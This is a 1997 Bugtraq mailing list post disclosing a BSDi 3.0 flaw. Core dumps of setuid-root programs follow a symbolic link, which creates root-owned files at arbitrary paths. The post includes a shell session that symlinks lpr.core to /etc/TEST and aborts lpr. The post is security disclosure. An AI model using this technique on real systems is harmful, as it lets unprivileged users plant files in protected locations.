Bugtraq mailing list archives
Core file anomalies under BSDi 3.0
From: scorpios () CS HUJI AC IL (Nir Soffer)
Date: Thu, 19 Jun 1997 20:42:33 +0300
Well for starters, system information : BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31 13:39:46 IDT 1997 danny () sexta cs huji ac il:/usr/src/sys/compile/SEXTA i386 A small and neat bug in BSDi 3.x allows people to arbitrarly write files with crap for data, but not overwrite them. Like so: Have a symbolic link, called [programname].core to desired file. Program must be setuid root. beep[ /tmp ] ls -la lpr.core lrwxrwxrwt 1 root wheel 9 Jun 19 20:30 lpr.core@ -> /etc/TEST beep[ /tmp ] Just to make sure that file doesn't exist : beep[ /tmp ] ls -la /etc/TEST ls: /etc/TEST: No such file or directory beep[ /tmp ] Run program. (In our case lpr is convenient since it waits for tty input and suspends itself.) beep[ /tmp ] lpr & [1] 27886 beep[ /tmp ] [1] + Suspended (tty input) lpr beep[ /tmp ] Kill it with the ABRT signal. beep[ /tmp ] kill -ABRT %1 beep[ /tmp ] fg lpr Abort (core dumped) beep[ /tmp ] And voila : beep[ /tmp ] ls -la /etc/TEST -rw------- 1 root wheel 184320 Jun 19 20:39 /etc/TEST beep[ /tmp ] This exploit is similar to the Solaris 2.4 core exploit - with a few notable diffrences : A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid program with priviliges isn't neccesary. B.) BSDi _does_ however, check if the file exists, so it's quite impossible to overwrite files. C.) BSDi _does_ change the permissions of the core dump to 600, and it keeps on being owned by root, so changing the file is impossible as well. Regards, Nir. -- Nir Soffer AKA ScorpioS, scorpios () cs huji ac il . USER, n.: The word computer professionals use when they mean "idiot." -- Dave Barry, "Claw Your Way to the Top"
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)
- <Possible follow-ups>
- Re: Netscape Admin Servers /tmp/deamonstat Corinne Posse (Jun 17)